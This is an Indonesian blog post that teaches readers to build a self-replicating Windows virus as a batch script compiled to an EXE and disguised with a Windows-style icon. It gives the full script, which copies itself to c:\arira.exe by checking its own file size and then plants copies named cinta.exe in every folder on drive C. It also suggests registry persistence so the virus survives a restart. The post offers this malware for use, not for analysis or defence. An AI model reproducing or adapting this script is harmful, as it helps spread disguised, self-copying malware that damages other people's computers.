Icon Changer (IC) diperlukan untuk mencari icon seperti icon kepunyaan windows.IC dapat didownload di http://www.shelllabs.com.Setelah membuka IC, search icon di folder windows\system32 , disitu akan ada banyak icon yang menarik, seperti icon folder, icon text,dll. Setelah ketemu icon yg diinginkan simpan icon tersebut.
Sekarang kita bahas masalah perintah cmdnya. Salah satu ciri virus yaitu kemampuan menggandakan diri. Seperti kita ketahui jika kita membuat bat file dg isinya “ copy %0 c:\ “ maka akan berakibat file bat tadi dicopikan ke c:\. Tapi ketika kita menggunakan perintah yg sama di quickbfc maka hasilnya tidak seperti itu, dalam artian file exe yang dihasilkan ketika di run tidak akan di copi ke drive c:\. Untuk menyiasati hal ini kita bisa menggunakan cara lain yaitu dengan perintah “for %%a in (*.exe) do if %%~za equ 12345 copy %%a c:\arira.exe “ .
Perintah ini berarti “ untuk setiap file exe dalam direktori ini jika file berukuran 12345 bytes maka copikan file (yg berukuran 12345 bytes tadi ) ke c:\ dg nama arira.exe “. 12345 adalah ukuran file virus hasil kompile dari quickbfc (misalnya) . Permasalahan yg ada adalah jika ada file exe yg ukurannya sama dan berada pada folder yg sama dengan file virus kita.
Ok,selanjutnya buat perintah lainnya.Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya “ explorer %userprofile% “.Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d” ,perintah ini berarti “untuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exe”. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.Dan seterusnya….dan seterusnya pikirkan sendiri perintahnya…..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.
Contoh: perintah cmd yang sudah kita buat
REM ini adalah awal dari skripfor %%a in (*.exe) do if %%~za equ 12345 copy “%%a” c:\arira.exeexplorer %userprofile%for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d”REM ini adalah akhir dari skrip
Sebelum dikompile pilih custom resources untuk menset icon dari file yang akan dihasilkan. Kompile skript diatas, kemudian lihat ukuran file exe yang dihasilkan. Misalkan ukuran file yang dihasilkan adalah 82571, maka ganti skript diatas sehingga menjadi
REM ini adalah awal dari skripfor %%a in (*.exe) do if %%~za equ 82571 copy “%%a” c:\arira.exeexplorer %userprofile%for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d”REM ini adalah akhir dari skrip
Kompile ulang, lihat ukuran file yang dihasilkan. Jika ukurannya 82571 bytes maka sudah benar. Jika belum, ulangi sampai angka pada skript sama dengan ukuran file yang dihasilkan.
Keterangan:Pada contoh perintah diatas “for %%a in (*.exe) do if %%~za equ 82571 copy %%a c:\arira.exe “ tidak bisa digunakan untuk cmd (hanya bisa untuk skript), kalau pingin menggunakan perintah ini dalam cmd makan ganti %%a dengan %a sehingga perintahnya akan menjadi “ for %a in (*.exe) do if %~za equ 82571 copy %a c:\arira.exe “
Diposting oleh Dj LoeTH-PHiE di 22.04 0 komentar
